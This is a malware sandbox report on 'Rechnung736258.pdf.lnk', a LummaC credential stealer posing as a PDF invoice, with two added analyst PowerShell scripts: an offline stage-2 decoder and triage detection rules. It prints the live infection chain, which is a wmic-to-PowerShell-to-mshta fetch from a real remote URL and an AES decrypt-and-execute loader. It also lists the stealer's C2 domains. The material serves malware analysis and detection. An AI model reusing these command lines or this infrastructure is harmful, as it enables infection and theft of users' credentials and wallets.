
Windows Analysis Report
Rechnung736258.pdf.lnk

Overview

General Information

Sample name: Rechnung736258.pdf.lnk
Analysis ID: 1579308
MD5: 5bfe0ada17542af48b71b2bd2861b738
SHA1: 2a4a858db4aff6ba8d9da7b104cec8e45fb426a8
SHA256: 021feed3c450c435bdbd4167f81f4917fcecf38e1836e9bff3c32e0063f3baf5
Tags: dimitricostruzioni-ch, lnk, user-smica83

Detection

Detected as: LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 2668 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4592 cmdline: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mshta.exe (PID: 5832 cmdline: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 3396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg [...] function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 4460 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 7256 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 7412 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,8685861103174925006,15707268363344924565,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • TCUINOVJ.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Roaming\TCUINOVJ.exe" MD5: 38F517307990F8B2F9CEB8DE5BD1A528)
            • iScrPaint.exe (PID: 5880 cmdline: "C:\Users\user\iScrPaint.exe" MD5: 098AC4621EE0E855E0710710736C2955)
              • iScrPaint.exe (PID: 6364 cmdline: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe MD5: 098AC4621EE0E855E0710710736C2955)
                • cmd.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • explorer.exe (PID: 940 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • svchost.exe (PID: 2888 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
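The chain in the tree above is: wmic.exe `process call create` starts powershell.exe, which dot-sources the wildcard path `\W*\S*2\m*ht*e` (PowerShell expands it to C:\Windows\System32\mshta.exe) with the remote URL; mshta.exe fetches the HTA from dimitricostruzioni.ch, and the HTA launches a second powershell.exe whose command line carries a hex blob in `$ddg`. The first 2304 hex characters of that blob are AES ciphertext, the remainder is the key, the IV is 16 zero bytes, and the decrypted text is split into a three-character command name (turned into the alias `fd` with `sal`) and the script that alias is invoked on; in this run that script opened the decoy KlarnaInvoice42611.pdf and dropped TCUINOVJ.exe. The PowerShell below is an added example, not code from the report or from the sample, that reproduces the decryption step so an analyst can read the second stage instead of letting `fd` run it. The demo blob, the random key, the three filler characters and the assumption that the aliased command is `iex` are constructed here; the real sample's full `$ddg` value is not on this page.

```powershell
# Added example: recover the AES-wrapped second stage of the loader offline.
# Assumptions: Aes::Create() defaults (CBC, PKCS7), all-zero IV, blob layout
# "<ciphertext hex><key hex>" split at a known index (2304 in this sample),
# and plaintext layout "<3 filler chars><3-char command name><script>".

function ConvertFrom-HexString {
    # Same job as the loader's vyt(): two hex characters per byte.
    param([Parameter(Mandatory)][string]$Hex)
    if ($Hex.Length % 2 -ne 0) { throw "odd-length hex string" }
    $bytes = New-Object byte[] ([int]($Hex.Length / 2))
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($Hex.Substring(2 * $i, 2), 16)
    }
    return ,$bytes
}

function ConvertTo-HexString {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    return ([BitConverter]::ToString($Bytes) -replace '-', '')
}

function Invoke-Stage2Decode {
    param(
        [Parameter(Mandatory)][string]$Blob,           # the $ddg value
        [Parameter(Mandatory)][int]$CipherHexLength    # the SubString(0, N) boundary
    )
    $cipher = ConvertFrom-HexString $Blob.Substring(0, $CipherHexLength)
    $key    = ConvertFrom-HexString $Blob.Substring($CipherHexLength)
    if ($key.Length -notin @(16, 24, 32)) { throw "key is $($key.Length) bytes; expected 16/24/32" }

    $aes = [System.Security.Cryptography.Aes]::Create()   # CBC + PKCS7 by default
    try {
        $aes.Key = $key
        $aes.IV  = New-Object byte[] 16                   # zero IV, as in the sample
        $plainBytes = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    } finally { $aes.Dispose() }

    # The loader calls [String]::new(byte[]); PowerShell binds that through a
    # byte->char widening, i.e. a Latin-1 decode, so decode the same way.
    $plain = [System.Text.Encoding]::GetEncoding(28591).GetString($plainBytes)
    if ($plain.Length -lt 6) { throw "decrypted text too short for Substring(3,3)/Substring(6)" }
    [pscustomobject]@{
        AliasTarget = $plain.Substring(3, 3)   # what 'sal fd <...>' would alias
        Stage2      = $plain.Substring(6)      # what 'fd <...>' would execute
    }
}

function New-Stage2Blob {
    # Builds a blob in the same layout so the decoder can be exercised offline.
    # Filler 'xxx' and command name 'iex' are assumptions for the demo.
    param([Parameter(Mandatory)][string]$Stage2, [Parameter(Mandatory)][byte[]]$Key)
    $plainBytes = [System.Text.Encoding]::GetEncoding(28591).GetBytes('xxx' + 'iex' + $Stage2)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key = $Key
        $aes.IV  = New-Object byte[] 16
        $cipher = $aes.CreateEncryptor().TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
    } finally { $aes.Dispose() }
    [pscustomobject]@{
        Blob            = (ConvertTo-HexString $cipher) + (ConvertTo-HexString $Key)
        CipherHexLength = 2 * $cipher.Length
    }
}

# Offline demonstration with a constructed key and a harmless stage 2.
$key = New-Object byte[] 32
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($key)
$demo = New-Stage2Blob -Stage2 'Write-Host "stage 2 would run here"' -Key $key
Invoke-Stage2Decode -Blob $demo.Blob -CipherHexLength $demo.CipherHexLength | Format-List
# Real sample: Invoke-Stage2Decode -Blob $ddg -CipherHexLength 2304
```

For the real sample the full `$ddg` string has to be taken from the report's process details, since the command line is cut off on this page. A wrong split index shows up as a CryptographicException from `TransformFinalBlock` (bad PKCS7 padding) or as the key-length check firing, which is the first thing to verify when a variant of this loader uses a different `SubString` boundary.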
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration:
{"C2 url": ["crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat", "securesways.click", "grannyejh.lat", "necklacebudi.lat"], "Build id": "AB15g1--"}
Yara matches

PCAP:
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Dropped files:
Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\iScrPaint.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Memory dumps:
Source | Rule | Description | Author
00000015.00000003.2738358264.0000000003115000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000015.00000003.2633160316.00000000030BD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
(6 further memory-dump matches not shown on this page)

Unpacked PE files:
Source | Rule | Description | Author
16.0.iScrPaint.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

                      System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie, CommandLine: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie, ProcessId: 5832, ProcessName: mshta.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg [...] function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie", ProcessId: 2668, ProcessName: WMIC.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg [...] function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3396, TargetFilename: C:\Users\user\AppData\Roaming\TCUINOVJ.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie, CommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 2668, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie, ProcessId: 4592, ProcessName: powershell.exe
Source: Process started; Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative; Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6552, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 940, ProcessName: explorer.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2888, ProcessName: svchost.exe
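The Sigma matches above are all process-creation events and describe one chain: wmic.exe as the launcher, powershell.exe spawned by wmic.exe with a wildcard-obfuscated path, mshta.exe handed a remote URL, a powershell.exe child of mshta.exe running with `-ep Unrestricted` and an inline AES decrypt that feeds an alias, and a 32-bit explorer.exe started by cmd.exe. The PowerShell below is an added example, not one of the Sigma rules and not code from the report, that turns those observations into simple triage checks and runs them over constructed records shaped like the Sigma output fields (Image, ParentImage, CommandLine, ProcessId). The records reuse command lines from the tree above, with the long `$ddg` blob abbreviated, plus one made-up benign record as a control; the rule names are this example's own.

```powershell
# Added example: triage checks for the LNK -> wmic -> powershell -> mshta ->
# powershell chain, over constructed process-creation records.

function Get-Leaf {
    # Last path component, independent of the host's directory separator.
    param([string]$Path)
    if (-not $Path) { return '' }
    return (($Path -split '[\\/]')[-1]).ToLowerInvariant()
}

function Test-SuspiciousProcessChain {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $img  = Get-Leaf $e.Image
        $pimg = Get-Leaf $e.ParentImage
        $cl   = [string]$e.CommandLine
        $hits = New-Object System.Collections.Generic.List[string]

        # wmic.exe "process call create" used as a launcher
        if ($img -eq 'wmic.exe' -and $cl -match 'process\s+call\s+create') { $hits.Add('wmic-process-call-create') }

        if ($img -in @('powershell.exe', 'pwsh.exe')) {
            if ($pimg -eq 'wmic.exe') { $hits.Add('powershell-spawned-by-wmic') }
            # wildcard-obfuscated executable path such as \W*\S*2\m*ht*e
            if ($cl -match '\\[^\s\\]*\*[^\s]*') { $hits.Add('wildcard-path-in-cmdline') }
            if ($cl -match '-(ep|executionpolicy)\s+(unrestricted|bypass)') { $hits.Add('insecure-execution-policy') }
            # inline AES decrypt whose result is bound to an alias (sal) and invoked
            if ($cl -match 'Cryptography\.Aes' -and $cl -match '\bsal\b') { $hits.Add('inline-aes-decrypt-to-alias') }
            if ($cl.Length -gt 1000) { $hits.Add('very-long-cmdline') }
        }

        # script host spawned by mshta.exe, and mshta.exe given a remote URL
        if ($pimg -eq 'mshta.exe' -and $img -in @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe')) { $hits.Add('mshta-spawned-script-host') }
        if ($img -eq 'mshta.exe' -and $cl -match 'https?://') { $hits.Add('mshta-remote-url') }

        # 32-bit explorer.exe started by a shell: injection host in this report
        if ($img -eq 'explorer.exe' -and $e.Image -match '\\SysWOW64\\' -and $pimg -in @('cmd.exe', 'powershell.exe')) { $hits.Add('explorer-wow64-scripted-parent') }

        if ($hits.Count -gt 0) {
            [pscustomobject]@{ ProcessId = $e.ProcessId; Image = $img; Parent = $pimg; Rules = ($hits -join ', ') }
        }
    }
}

# Constructed records (PIDs and command lines from the tree above; the
# $ddg hex blob is abbreviated, and PID 1234 is a made-up benign control).
$events = @(
    [pscustomobject]@{ ProcessId = 2668; Image = 'C:\Windows\System32\wbem\WMIC.exe'; ParentImage = ''
        CommandLine = '"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"' }
    [pscustomobject]@{ ProcessId = 4592; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\System32\wbem\WMIC.exe'
        CommandLine = 'powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie' }
    [pscustomobject]@{ ProcessId = 5832; Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = '"C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie' }
    [pscustomobject]@{ ProcessId = 3396; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\System32\mshta.exe'
        CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = ''<hex blob abbreviated>'';$pzg = [System.Security.Cryptography.Aes]::Create();sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)' }
    [pscustomobject]@{ ProcessId = 940; Image = 'C:\Windows\SysWOW64\explorer.exe'; ParentImage = 'C:\Windows\SysWOW64\cmd.exe'
        CommandLine = 'C:\Windows\SysWOW64\explorer.exe' }
    [pscustomobject]@{ ProcessId = 1234; Image = 'C:\Windows\System32\notepad.exe'; ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = '"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt' }
)

Test-SuspiciousProcessChain -Events $events | Format-Table -AutoSize
```

Every record from the chain produces at least one rule name and the control produces none. The wildcard check is deliberately broad (any backslash-prefixed token containing `*` in a PowerShell command line) and will also match harmless globs such as `dir C:\*.log`, so it is a triage signal to combine with the parent-child checks, not a standalone alert; the `very-long-cmdline` check does not fire on the abbreviated record here but does on the real 3396 command line, which the report flags as "Very long command line found".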
Suricata IDS alerts (analysis host 192.168.2.5), in time order:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-21T14:59:11.549244+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 62.182.21.105 | 443 | TCP
2024-12-21T14:59:52.458854+0100 | 2058308 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55295 | 1.1.1.1 | 53 | UDP
2024-12-21T14:59:54.022416+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49803 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:54.022416+0100 | 2058309 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49803 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:56.939866+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49803 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:56.939866+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49803 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:58.175252+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49815 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:58.175252+0100 | 2058309 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49815 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:59.025544+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49815 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:59.025544+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49815 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:00.799468+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49821 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:00.799468+0100 | 2058309 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49821 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:03.593870+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49832 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:03.593870+0100 | 2058309 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49832 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:06.068835+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49838 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:06.068835+0100 | 2058309 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49838 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:11.085708+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49849 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:11.085708+0100 | 2058309 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49849 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:12.280466+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49849 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:13.970949+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49855 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:13.970949+0100 | 2058309 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49855 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:18.946471+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49871 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:18.946471+0100 | 2058309 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49871 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:19.811654+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49871 | 104.21.16.1 | 443 | TCP

                      AV Detection

Source: 21.2.explorer.exe.9a0000.0.unpack; Malware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat", "securesways.click", "grannyejh.lat", "necklacebudi.lat"], "Build id": "AB15g1--"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]; ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe; ReversingLabs: Detection: 30%
Source: Rechnung736258.pdf.lnk; ReversingLabs: Detection: 15%
Source: Rechnung736258.pdf.lnk; Virustotal: Detection: 24%
Source: Submitted sample; Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Temp\umffwoglbib; Joe Sandbox ML: detected
String decryptor results from memory dump 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmp (explorer.exe):
  rapeflowwj.lat
  crosshuaht.lat
  sustainskelet.lat
  aspecteirs.lat
  energyaffai.lat
  necklacebudi.lat
  discokeyus.lat
  grannyejh.lat
  securesways.click
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
